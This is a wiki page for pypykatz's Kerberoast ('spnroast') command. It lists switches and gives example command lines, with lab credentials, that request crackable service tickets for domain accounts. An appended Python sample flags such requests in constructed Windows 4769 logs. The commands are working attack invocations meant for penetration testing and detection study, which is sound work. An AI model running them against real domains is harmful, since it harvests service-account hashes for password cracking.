
Kerberos spnroast command

skelsec edited this page Apr 15, 2021 · 3 revisions

What it does

Performs the SPNroast (aka kerberoast) attack against a list of users

Remarks

The list of users can be in a file (one username per line) or can be set in a command line argument (at the end of the command). You may even mix the two.
Important: The expected format is <user>@<realm>, but you don't need to specify the target users in this format if you don't wish to: just the username is enough IF you also supply the -d <realm> switch.

Requirements

You will need the following things:

  • Credentials of a domain user. This credential can be the password, the NT hash, or the secret key (RC4/AES128/AES256)
  • A list of usernames prone to the spnroast attack
  • Instead of targets and realm, you can use an LDAP connection string to load the targets automatically

Subcommands

None

Switches

  • -o: Writes the result to a file
  • -d: Realm aka domain name
  • -e: Specifies which encryption type should be requested. Default is RC4 (23)
  • -t or --targets: Targets to be loaded from file or as SPN string, or just username if -d is set.
  • -l or --ldap: LDAP URL in ConnectionURL format. This will fetch the targets from the DC via LDAP.
  • url: Kerberos URL in ConnectionURL format.

Examples

  • pypykatz kerberos spnroast 'kerberos+password://TEST\victim:Passw0rd!1@10.10.10.2' -t srv_http@test.corp: Performs the kerberoast attack against user srv_http@test.corp. Output will be printed to console in hashcat format
  • pypykatz kerberos spnroast 'kerberos+password://TEST\victim:Passw0rd!1@10.10.10.2' -d test.corp -t srv_http: Same as above, but this time the username and realm were specified separately
  • pypykatz kerberos spnroast 'kerberos+password://TEST\victim:Passw0rd!1@10.10.10.2' -d test.corp -t vulnerable_users.txt: Same as above, but the target users are fetched from the vulnerable_users.txt file
  • pypykatz kerberos spnroast 'kerberos+password://TEST\victim:Passw0rd!1@10.10.10.2' -e 18 srv_http@test.corp: Same as the first command, but the encryption type is changed to AES256. (just an example, don't do this)
  • pypykatz kerberos spnroast 'kerberos+password://TEST\victim:Passw0rd!1@10.10.10.2' -l 'ldap+ntlm-password://TEST\victim:Passw0rd!1@10.10.10.2': spnroast against targets loaded via LDAP
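To see what the -e switch and the "-e 18" example above look like from the monitoring side, here is an added example (not pypykatz code) that flags the classic Kerberoast pattern in Windows Security Event 4769 records: RC4 (etype 23) service tickets granted to one client for several user-owned SPN accounts. The event records are constructed samples; field names follow the 4769 event schema, and the threshold is an assumption.

```python
# Added example, not part of pypykatz: flag Kerberoast-style TGS requests in
# Windows Security Event 4769 records. Sample records below are constructed.
from collections import defaultdict

RC4_HMAC = 0x17   # etype 23: pypykatz's default request type, easiest to crack
AES256 = 0x12     # etype 18: what "-e 18" requests; invisible to the RC4 rule

def is_roastable_request(ev):
    """True when a granted TGS request looks like a Kerberoast probe:
    RC4 requested for a user-owned (not machine) service account."""
    svc = ev["ServiceName"]
    return (
        int(ev["TicketEncryptionType"], 16) == RC4_HMAC
        and ev["Status"] == "0x0"
        and not svc.endswith("$")        # machine accounts have random passwords
        and svc.lower() != "krbtgt"
    )

def find_roasting_clients(events, min_services=3):
    """Group suspicious 4769s by requesting user and source IP; return those that
    asked for RC4 tickets to at least `min_services` distinct service accounts."""
    seen = defaultdict(set)
    for ev in events:
        if is_roastable_request(ev):
            seen[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_services}

# Constructed 4769 records, reduced to the fields used above
SAMPLE_4769 = [
    {"TargetUserName": "victim@TEST.CORP", "ServiceName": "srv_http",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.10.50"},
    {"TargetUserName": "victim@TEST.CORP", "ServiceName": "srv_sql",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.10.50"},
    {"TargetUserName": "victim@TEST.CORP", "ServiceName": "srv_ftp",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.10.50"},
    # normal activity: ticket for a workstation's machine account, AES
    {"TargetUserName": "alice@TEST.CORP", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.10.10.51"},
    # the "-e 18" case: AES requested, so the RC4 rule alone does not catch it;
    # a volume baseline per requester is needed for that variant
    {"TargetUserName": "victim@TEST.CORP", "ServiceName": "srv_http",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.10.10.50"},
]

if __name__ == "__main__":
    for (user, ip), services in find_roasting_clients(SAMPLE_4769).items():
        print(f"{user} from {ip} requested RC4 tickets for: {', '.join(services)}")
```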